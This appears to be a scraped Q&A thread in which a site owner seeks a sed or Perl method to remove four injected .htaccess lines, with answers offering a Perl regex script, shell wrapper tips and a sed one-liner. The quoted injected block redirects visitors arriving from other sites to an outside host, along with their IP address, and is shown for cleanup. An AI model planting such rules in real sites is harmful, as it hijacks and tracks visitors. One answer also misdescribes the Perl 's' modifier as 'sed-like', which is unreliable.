Removing a text block from a file : sed?_问答_开发者

Following an attack, I need to remove 4 lines of text added to .htaccess files in my site, and was thinking SED would be the way to go, but cannot see how in spire of many attempts.

The added lines are

RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://
RewriteCond %{HTTP_REFERER} !%{HTTP_HOST}
RewriteRule . http://targeturlhere.net/%{REMOTE_ADDR}

I managed to create the script to remove added htaccess files containing those lines only, but for existing htaccess files in which that was appended I have to edit the file and cannot delete it. I cannot just remove line by line nor use "RewriteEngine On" as the start marker, as this instruction "RewriteEngine On" is sometimes legitimate elsewhere in the file.

In most cases those lines are the last, but I guess in other files they 开发者_运维问答could be in the middle, so I was trying to remove exactly that block - and have a script I could reuse in a similar case.

(Edit: my 4 lines are below one another, no blank line in between but the editor here seems to either show no breakline, or one adding a blank line)

Any hint or tip ? Thanks.

If you can't trigger off the 'RewriteEngine On' line (because it is occasionally used legitimately), then 'sed' is probably not the correct tool for the job. I'd use Perl (tested code follows):

my $file;
do { local $/; $file = <>; }; # Slurp!

$file =~ s{
            RewriteEngine \s On \n
            RewriteCond \s %{HTTP_REFERER} \s [\^]http:// \n
            RewriteCond \s %{HTTP_REFERER} \s !%{HTTP_HOST} \n
            RewriteRule \s \. \s http://targeturlhere\.net/%{REMOTE_ADDR} \n
          }{}gmsx;

print $file;

The file is slurped into memory; then the data you don't want is removed (repeatedly, just in case one of the files was modified multiple times), then the residue is written to standard output. The gmsx modifiers do:

g - global
m - multiline
s - sed-like
x - extended (white space is ignored - use \s (or \s+) to match actual white space.

This is designed to process one file at a time (per invocation of the script). You can make it handle multiple files on the command line with overwriting of the originals etc if you are careful; the problem area is the 'slurp' operation. The code assumes you want to read all the file(s) into memory and work on that - which is correct since you need to match over multiple lines.

The comment asks:

[I] already have a working bash script that lists and scans hosted sites, then deleted files containing only those lines, and I was waiting to add that editing function. Can I simply use Perl now inside that script, or by calling it?

If you can identify that the file contains material other than just the four lines you need removed, then you can invoke Perl from inside the script to deal with that file:

Save the code I showed in a file fixit.pl:
- Add a shebang line #!/usr/bin/env perl
- For good discipline, consider adding use strict; and use warnings; after the shebang and before the code. In this case, it makes no difference (the code is clean), but if you're making changes, include those lines. I do - but I know I'm fallible.
- Make it executable, and in a directory on your PATH, or know its location.

In your shell script:

...
else
    fixit.pl $file > $tmp.1
    mv $tmp.1 $file
fi

You may have other ways of doing it, but it only needs to be that complex. I'm assuming that you have a variable tmp initialized appropriately:

tmp=${TMPDIR:-/tmp}/fixit.$$

You would probably want to include traps to ensure that the file is cleaned up:

trap "rm -f $tmp.?; exit 1" 0 1 2 3 13 15
...code as above...
rm -f $tmp.?
trap 0
exit 0

The first trap line traps signals 1 (HUP), 2 (INT), 3 (QUIT), 13 (PIPE), and 15 (TERM), plus any shell exit of its own accord (0), and executes the given commands (removing the temporary file and exiting with a failure status). The stray rm -f line makes sure the file is missing; the trap 0 cancels the trap for 'shell exiting of its own accord', and the exit 0 exits successfully. It means you can interrupt your processing and not have stray files left around - good practice for any shell script that creates temporary files.

Alternatively, you could use:

perl -i.bak fixit.pl $file

This will create a file name "$file.bak" with the original, and the output will have gone to the original file name "$file". This avoids the need to use traps etc. If you don't want the backup file, then omit the '.bak' from the command line.

sed '1{N;N};N;\|\nRewriteRule . http://targeturlhere.net/%{REMOTE_ADDR}$|d;P;D' inputfile

This looks for the last line of the set of four and when it's found, it deletes them. It passes through all other lines.

You can add the -i option (sed -i ...) to make it modify the files in place. You can add an optional backup extension to make it backup the original (sed -i .bak ...).